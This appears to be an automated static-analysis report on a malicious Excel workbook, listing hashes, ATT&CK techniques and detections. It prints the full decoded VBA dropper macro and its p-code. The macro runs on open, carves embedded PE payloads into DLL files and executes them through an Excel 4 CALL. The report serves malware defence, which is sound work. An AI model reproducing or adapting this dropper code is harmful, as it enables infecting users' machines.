Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21968af1913f18de…

MALICIOUS

Office (OLE)

810.0 KB Created: 2020-06-22 10:41:03 Authoring application: Microsoft Excel First seen: 2020-07-24
MD5: fdf3c69cbd32d23f7f607c4f3920404a SHA-1: 84c3aaeb05ebaffb5963df4572d433a7fc63d545 SHA-256: 21968af1913f18de4d4144d321e9f27169af5f628762033ad7eb17bb0f394ea7
490 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1106 Execution through API T1566.001 Spearphishing Attachment T1027 Obfuscated Files or Information T1105 Ingress Tool Transfer

The sample is an Excel document containing VBA macros, specifically a Workbook_Open macro that triggers execution. This macro utilizes Shell() and CallByName functions, indicative of malicious intent. Furthermore, it embeds a PE executable, which is likely a second-stage payload. The presence of VirtualAlloc, LoadLibrary, and GetProcAddress API calls suggests the embedded executable is designed to perform dynamic code loading and execution.

Heuristics 12

  • ClamAV: Win.Dropper.Hideproc-6663113-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
             sendings = 1
         Dim sNMSP As New Shell
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
       CallByName WelcomeDialog, "Show", VbMethod
End If
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/2000/svg In document text (OLE body)
    • http://www.w3.org/1999/xlinkIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30851 bytes
SHA-256: e9fbdee671d09094cd35a77b574d5f8c1b9efd905ea3c60655b977d7ffae704e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Module0.WuzzyBud 800
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Activate()

End Sub

Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub


Attribute VB_Name = "CarClass"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    
Dim vSpeed As Integer
Dim vLicensePlate As String
 
Public Property Get Speed() As Integer
    Speed = vSpeed
End Property
 
Public Property Let Speed(sp As Integer)
    vSpeed = Application.WorksheetFunction.Min(sp, 100)
    vSpeed = Application.WorksheetFunction.Max(vSpeed, -100)
End Property
 
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" & Drive)

End Property
Public Property Get SpecialFolders() As String
    LicensePlate = vLicensePlate
End Property
 
Public Property Let LicensePlate(lp As String)
    If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
    vLicensePlate = lp
End Property



Attribute VB_Name = "Module0"



Public Sub WuzzyBud(dImmer As Integer)

If WelcomeDialog.Visible = True Then
Exit Sub
End If

Dim ActiveHotbit As New WshShell
 Dim s As String
 Dim GetInfirmityLevelDescription As String
    
    Dim d As Long
    d = 3
    d = d - 1
    Select Case d
    Case 0
        s = "No health problems"
    Case 1
        s = "Minor health problems"
    Case 2
        s = "Major health problems"
       
    Case 3
        s = "Severe disability"
    End Select


    Dim SpecialPath As String
    

PRP = "%" + K6GOAM.TextBox1.Tag

K6GOAM.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%")

    
Dim car As CarClass
Set car = New CarClass
K6GOAM.TextBox3.Tag = car.CheckCar(ActiveHotbit, "" & K6GOAM.TextBox3.Tag & "")
ChDir (K6GOAM.TextBox1.Tag)
If WelcomeDialog.Visible = False Then

   CallByName WelcomeDialog, "Show", VbMethod
End If
End Sub








Attribute VB_Name = "Module1"
 Public Const FirstB As Byte = 77
 Public Const SecondB As Byte = 90
 Public Const ThirdB As Byte = 144
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub










Attribute VB_Name = "Module2"

Private Sub ERRCHECK(result)
 If result = RCPN_D_FMOD_OK Then
 ms.gR.esult = MsgBox(result & ") ")
 End If
End Sub







Public Sub VistaQ(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
End Sub











Public Sub DerTip()
    
 Dim sendings As Integer
    dershlep = "" + K6GOAM.TextBox1.Tag
    Dim ofbl As String
    Dim sOfbl As String
    ofbl = K6GOAM.TextBox3.Tag + "\libIntel"
    Dim CurrentSizeOfAT As Long

ctackPup = K6GOAM.TextBox1.Tag + "\manufact.xls" + "x"

        ctackPop = dershlep & K6GOAM.TextBox3.Value
        
         Dim arr(1 To 3) As String
        
ctackPip = ctackPup & Page11.Range("A100").Value

 PublicResumEraseByArrayList ctackPop, ofbl, ctackPip
 
  VistaQ ctackPup
    
        FileCopy ctackPup, ctackPip
         sendings = 1
         Dim sNMSP As New Shell
              
          
        If sendings > 0 And sendings > -30 Then
         
            Set DestinationKat = sNMSP.Namespace(dershlep)
            Set harvest = sNMSP.Namespace(ctackPip)
          
          
        End If
         FlagDouble = True
DestinationKat.CopyHere harvest.Items.Item(K6GOAM.Label11.Tag)

              For StepBit = 1 To 2
 
    CurrentSizeOfAT = 326656
      sendings = 1
            sendingsCSTR = "1"
        If FlagDouble Then
                CurrentSizeOfAT = 200000 + 59070 + 2
                sendings = 2
                FlagDouble = False
            sendingsCSTR = "2"
            End If
            
            sOfbl = ofbl + sendingsCSTR + ".dll"
 Composition dershlep & K6GOAM.Label1.Tag, sOfbl, CurrentSizeOfAT, sendings
       
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        If -100 <= sendings Then
            sendings = sendings + 1
            ChDir (K6GOAM.TextBox3.Tag)
            sendings = sendings + 1
        End If
        
            
       
       
        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        sOfbl = """" + sOfbl

  
   varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl & """,""" + "fruudt"",""J"")")
   If IsNumeric(varRes1) Then
    If varRes1 = 0 Then
        Exit Sub
    End If
    End If
   
Next
End Sub
















Attribute VB_Name = "Module4"




 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub

























Attribute VB_Name = "Module5"
 
 Public DisputeChannel3 As Byte
     
Public HurricanMoes() As Byte

     
    Public abbrev As Byte
 Dim DecemberUpdate As Byte
 
 




Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub

Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
 Dim DisputeChannel1 As Long
 
 Dim SimpleMethod As Integer
 ReDim HurricanMoes(1 To fl)
 DisputeChannel1 = FreeFile
 Open Composition2 For Binary Access Read As DisputeChannel1
 Dim cur As Integer
 cur = 1
Do While 1
 Get DisputeChannel1, , abbrev
 If abbrev = FirstB Then
 HurricanMoes(1) = abbrev
 Get DisputeChannel1, , DisputeChannel3
 If DisputeChannel3 = SecondB Then
 HurricanMoes(2) = DisputeChannel3
 Get DisputeChannel1, , DecemberUpdate
 If DecemberUpdate = ThirdB Then
 HurricanMoes(3) = DecemberUpdate
 If cur = DisputeChannel6 Then
 For k = 4 To fl
 Get DisputeChannel1, , abbrev
 HurricanMoes(k) = abbrev
 Next k
 Exit Do
 Else
 cur = cur + 1
 End If
 End If
 End If
 End If
 Loop
 Close DisputeChannel1
 On Error Resume Next
 DisputeChannel1 = FreeFile
 Open ofbl For Binary Lock Read Write As #DisputeChannel1
 For i = LBound(HurricanMoes) To UBound(HurricanMoes)
 If WelcomeDialog.Enabled = True Then

 Put #DisputeChannel1, , HurricanMoes(i)
 End If
 Next i
 Close DisputeChannel1
 DisputeChannel1 = FreeFile
 For HSP = 33 To -1 Step -0.25
 DisputeChannel1 = 6 + i
 Next HSP
End Sub










Attribute VB_Name = "K6GOAM"
Attribute VB_Base = "0{85A3F827-CE21-44D3-A439-8551D5EECD6C}{81369CF4-DC73-467B-B313-9F6CBD91B156}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "WelcomeDialog"
Attribute VB_Base = "0{8FBF4C6B-755F-4777-96BD-B65ED5A0387C}{1B92BE20-B830-4B88-A1A7-66896B620D1D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
DoEvents
DoEvents
DerTip
DoEvents
End Sub





' Processing file: /tmp/qstore_1xr5eeom
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 1362 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Open())
' Line #1:
' 	Ld WelcomeDialog 
' 	MemLd Visible 
' 	LitVarSpecial (True)
' 	Eq 
' 	IfBlock 
' Line #2:
' 	ExitSub 
' Line #3:
' 	EndIfBlock 
' Line #4:
' 	LitDI2 0x0320 
' 	Ld Module0 
' 	ArgsMemCall WuzzyBud 0x0001 
' Line #5:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 1001 bytes
' _VBA_PROJECT_CUR/VBA/Page11 - 1385 bytes
' Line #0:
' 	FuncDefn (Private Sub Worksheet_Activate())
' Line #1:
' Line #2:
' 	EndSub 
' Line #3:
' Line #4:
' 	FuncDefn (Private Sub Worksheet_SelectionChange(ByVal Target As ))
' Line #5:
' Line #6:
' 	EndSub 
' Line #7:
' _VBA_PROJECT_CUR/VBA/CarClass - 2803 bytes
' Line #0:
' Line #1:
' 	Dim 
' 	VarDefn vSpeed (As Integer)
' Line #2:
' 	Dim 
' 	VarDefn vLicensePlate (As String)
' Line #3:
' Line #4:
' 	FuncDefn (Public Property Get Speed(id_FFFE As Integer) As Integer)
' Line #5:
' 	Ld vSpeed 
' 	St Speed 
' Line #6:
' 	EndProp 
' Line #7:
' Line #8:
' 	FuncDefn (Public Property Let Speed(sp As Integer))
' Line #9:
' 	Ld sp 
' 	LitDI2 0x0064 
' 	Ld Application 
' 	MemLd WorksheetFunction 
' 	ArgsMemLd Min 0x0002 
' 	St vSpeed 
' Line #10:
' 	Ld vSpeed 
' 	LitDI2 0x0064 
' 	UMi 
' 	Ld Application 
' 	MemLd WorksheetFunction 
' 	ArgsMemLd Max 0x0002 
' 	St vSpeed 
' Line #11:
' 	EndProp 
' Line #12:
' Line #13:
' 	FuncDefn (Public Property Get CheckCar(car As Object, Drive As String, id_FFFE As Variant))
' Line #14:
' 	LitStr 0x0000 ""
' 	Ld Drive 
' 	Concat 
' 	Ld car 
' 	ArgsMemLd SpecialFolders 0x0001 
' 	St CheckCar 
' Line #15:
' Line #16:
' 	EndProp 
' Line #17:
' 	FuncDefn (Public Property Get SpecialFolders(id_FFFE As String) As String)
' Line #18:
' 	Ld vLicensePlate 
' 	St LicensePlate 
' Line #19:
' 	EndProp 
' Line #20:
' Line #21:
' 	FuncDefn (Public Property Let LicensePlate(lp As String))
' Line #22:
' 	Ld lp 
' 	FnLen 
' 	LitDI2 0x0006 
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld xlErrValue 
' 	Paren 
' 	Ld Err 
' 	ArgsMemCall Raise 0x0001 
' 	EndIf 
' 	QuoteRem 0x0030 0x000B "Raise error"
' Line #23:
' 	Ld lp 
' 	St vLicensePlate 
' Line #24:
' 	EndProp 
' Line #25:
' Line #26:
' _VBA_PROJECT_CUR/VBA/Module0 - 3019 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Public Sub WuzzyBud(dImmer As Integer))
' Line #4:
' Line #5:
' 	Ld WelcomeDialog 
' 	MemLd Visible 
' 	LitVarSpecial (True)
' 	Eq 
' 	IfBlock 
' Line #6:
' 	ExitSub 
' Line #7:
' 	EndIfBlock 
' Line #8:
' Line #9:
' 	Dim 
' 	VarDefn ActiveHotbit (New )
' Line #10:
' 	Dim 
' 	VarDefn s (As String)
' Line #11:
' 	Dim 
' 	VarDefn GetInfirmityLevelDescription (As String)
' Line #12:
' Line #13:
' 	Dim 
' 	VarDefn d (As Long)
' Line #14:
' 	LitDI2 0x0003 
' 	St d 
' Line #15:
' 	Ld d 
' 	LitDI2 0x0001 
' 	Sub 
' 	St d 
' Line #16:
' 	Ld d 
' 	SelectCase 
' Line #17:
' 	LitDI2 0x0000 
' 	Case 
' 	CaseDone 
' Line #18:
' 	LitStr 0x0012 "No health problems"
' 	St s 
' Line #19:
' 	LitDI2 0x0001 
' 	Case 
' 	CaseDone 
' Line #20:
' 	LitStr 0x0015 "Minor health problems"
' 	St s 
' Line #21:
' 	LitDI2 0x0002 
' 	Case 
' 	CaseDone 
' Line #22:
' 	LitStr 0x0015 "Major health problems"
' 	St s 
' Line #23:
' Line #24:
' 	LitDI2 0x0003 
' 	Case 
' 	CaseDone 
' Line #25:
' 	LitStr 0x0011 "Severe disability"
' 	St s 
' Line #26:
' 	EndSelect 
' Line #27:
' Line #28:
' Line #29:
' 	Dim 
' 	VarDefn SpecialPath (As String)
' Line #30:
' Line #31:
' Line #32:
' 	LitStr 0x0001 "%"
' 	Ld K6GOAM 
' 	MemLd TextBox1 
' 	MemLd Tag 
' 	Add 
' 	St PRP 
' Line #33:
' Line #34:
' 	Ld PRP 
' 	LitStr 0x0001 "%"
' 	Add 
' 	Ld ActiveHotbit 
' 	ArgsMemLd ExpandEnvironmentStrings 0x0001 
' 	Ld K6GOAM 
' 	MemLd TextBox1 
' 	MemSt Tag 
' Line #35:
' Line #36:
' Line #37:
' 	Dim 
' 	VarDefn car (As CarClass)
' Line #38:
' 	SetStmt 
' 	New 0
' 	Set car 
' Line #39:
' 	Ld ActiveHotbit 
' 	LitStr 0x0000 ""
' 	Ld K6GOAM 
' 	MemLd TextBox3 
' 	MemLd Tag 
' 	Concat 
' 	LitStr 0x0000 ""
' 	Concat 
' 	Ld car 
' 	ArgsMemLd CheckCar 0x0002 
' 	Ld K6GOAM 
' 	MemLd TextBox3 
' 	MemSt Tag 
' Line #40:
' 	Ld K6GOAM 
' 	MemLd TextBox1 
' 	MemLd Tag 
' 	Paren 
' 	ArgsCall ChDir 0x0001 
' Line #41:
' 	Ld WelcomeDialog 
' 	MemLd Visible 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #42:
' Line #43:
' 	Ld WelcomeDialog 
' 	LitStr 0x0004 "Show"
' 	Ld id_0338 
' 	ArgsCall VbMethod 0x0003 
' Line #44:
' 	EndIfBlock 
' Line #45:
' 	EndSub 
' Line #46:
' Line #47:
' Line #48:
' Line #49:
' Line #50:
' Line #51:
' Line #52:
' _VBA_PROJECT_CUR/VBA/Module1 - 2741 bytes
' Line #0:
' 	Dim (Public Const) 
' 	LitDI2 0x004D 
' 	VarDefn FirstB (As Byte)
' Line #1:
' 	Dim (Public Const) 
' 	LitDI2 0x005A 
' 	VarDefn SecondB (As Byte)
' Line #2:
' 	Dim (Public Const) 
' 	LitDI2 0x0090 
' 	VarDefn ThirdB (As Byte)
' Line #3:
' 	FuncDefn (Public Sub GetParam(Count As Integer))
' Line #4:
' 	Dim 
' 	VarDefn i (As Long)
' Line #5:
' 	Dim 
' 	VarDefn j (As Integer)
' Line #6:
' 	Dim 
' 	VarDefn c (As String)
' Line #7:
' 	Dim 
' 	VarDefn tooolsetChunkI (As Boolean)
' Line #8:
' 	Dim 
' 	VarDefn tooolsetChunkQ (As Boolean)
' Line #9:
' Line #10:
' 	LitDI2 0x0001 
' 	St j 
' Line #11:
' 	LitVarSpecial (False)
' 	St tooolsetChunkI 
' Line #12:
' 	LitVarSpecial (False)
' 	St tooolsetChunkQ 
' Line #13:
' 	LitStr 0x0000 ""
' 	Ld GetP 
' 	MemSt aram 
' Line #14:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Comma 
' 	MemLd nd$ 
' 	FnLen 
' 	For 
' Line #15:
' 	Ld Comma 
' 	MemLd nd$ 
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld Mi 
' 	ArgsMemLd d$ 0x0003 
' 	St c 
' Line #16:
' 	Ld tooolsetChunkI 
' 	IfBlock 
' Line #17:
' 	Ld c 
' 	LitStr 0x0001 """
' 	Eq 
' 	IfBlock 
' Line #18:
' 	Ld j 
' 	LitDI2 0x0001 
' 	Add 
' 	St j 
' Line #19:
' 	LitVarSpecial (False)
' 	St tooolsetChunkI 
' Line #20:
' 	LitVarSpecial (False)
' 	St tooolsetChunkQ 
' Line #21:
' 	EndIfBlock 
' Line #22:
' 	Ld tooolsetChunkI 
' 	Ld tooolsetChunkQ 
' 	Not 
' 	And 
' 	ElseIfBlock 
' Line #23:
' 	Ld c 
' 	LitStr 0x0001 " "
' 	Eq 
' 	IfBlock 
' Line #24:
' 	Ld j 
' 	LitDI2 0x0001 
' 	Add 
' 	St j 
' Line #25:
' 	LitVarSpecial (False)
' 	St tooolsetChunkI 
' Line #26:
' 	LitVarSpecial (False)
' 	St tooolsetChunkQ 
' Line #27:
' 	EndIfBlock 
' Line #28:
' 	ElseBlock 
' Line #29:
' 	Ld c 
' 	LitStr 0x0001 """
' 	Eq 
' 	IfBlock 
' Line #30:
' 	Ld j 
' 	Ld Count 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	ExitSub 
' 	EndIf 
' Line #31:
' 	LitVarSpecial (True)
' 	St tooolsetChunkI 
' Line #32:
' 	LitVarSpecial (True)
' 	St tooolsetChunkQ 
' Line #33:
' 	Ld c 
' 	LitStr 0x0001 " "
' 	Ne 
' 	ElseIfBlock 
' Line #34:
' 	LitVarSpecial (True)
' 	St tooolsetChunkI 
' Line #35:
' 	LitVarSpecial (False)
' 	St tooolsetChunkQ 
' Line #36:
' 	EndIfBlock 
' Line #37:
' 	EndIfBlock 
' Line #38:
' 	Ld tooolsetChunkI 
' 	Ld j 
' 	Ld Count 
' 	Eq 
' 	And 
' 	Ld c 
' 	LitStr 0x0001 """
' 	Ne 
' 	And 
' 	If 
' 	BoSImplicit 
' 	Ld GetP 
' 	MemLd aram 
' 	Ld c 
' 	Concat 
' 	Ld GetP 
' 	MemSt aram 
' 	EndIf 
' Line #39:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #40:
' 	EndSub 
' Line #41:
' Line #42:
' Line #43:
' Line #44:
' Line #45:
' Line #46:
' Line #47:
' Line #48:
' Line #49:
' _VBA_PROJECT_CUR/VBA/Module2 - 5597 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub ERRCHECK(result))
' Line #2:
' 	Ld result 
' 	Ld RCPN_D_FMOD_OK 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	Ld result 
' 	LitStr 0x0002 ") "
' 	Concat 
' 	ArgsLd MsgBox 0x0001 
' 	Ld ms 
' 	MemLd gR 
' 	MemSt esult 
' Line #4:
' 	EndIfBlock 
' Line #5:
' 	EndSub 
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' 	FuncDefn (Public Sub VistaQ(WhereToGo))
' Line #14:
' 	ArgsCall DoEvents 0x0000 
' Line #15:
' 	Ld ThisWorkbook 
' 	MemLd Sheets 
' 	ArgsMemCall Copy 0x0000 
' Line #16:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #17:
' 	ArgsCall DoEvents 0x0000 
' Line #18:
' 	Ld WhereToGo 
' 	LitVarSpecial (False)
' 	ParamNamed Local 
' 	LitDI2 0x0003 
' 	LitDI2 0x0007 
' 	Mul 
' 	LitDI2 0x0003 
' 	LitDI2 0x0007 
' 	Mul 
' 	Add 
' 	LitDI2 0x0009 
' 	Add 
' 	ParamNamed FileFormat 
' 	Ld ActiveWorkbook 
' 	ArgsMemCall SaveAs 0x0003 
' Line #19:
' 	ArgsCall DoEvents 0x0000 
' Line #20:
' 	Ld ActiveWorkbook 
' 	ArgsMemCall Close 0x0000 
' Line #21:
' 	ArgsCall DoEvents 0x0000 
…
embedded_office_00006265.exe embedded-pe Office MZ+PE at offset 0x6265 804251 bytes
SHA-256: 589cb863a4a4a2049451a97bc1b6553dd0b1d3fc9f26e954276bbb854b5a9579
Detection
ClamAV: Win.Dropper.Hideproc-6663113-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: MBD006D6CCC/Ole10Native 614055 bytes
SHA-256: 938a226a0cea765197773a07c303387cd806465ddb346b3850b96578c79ac5f3

Open this report in the interactive analyzer, or submit your own file for analysis.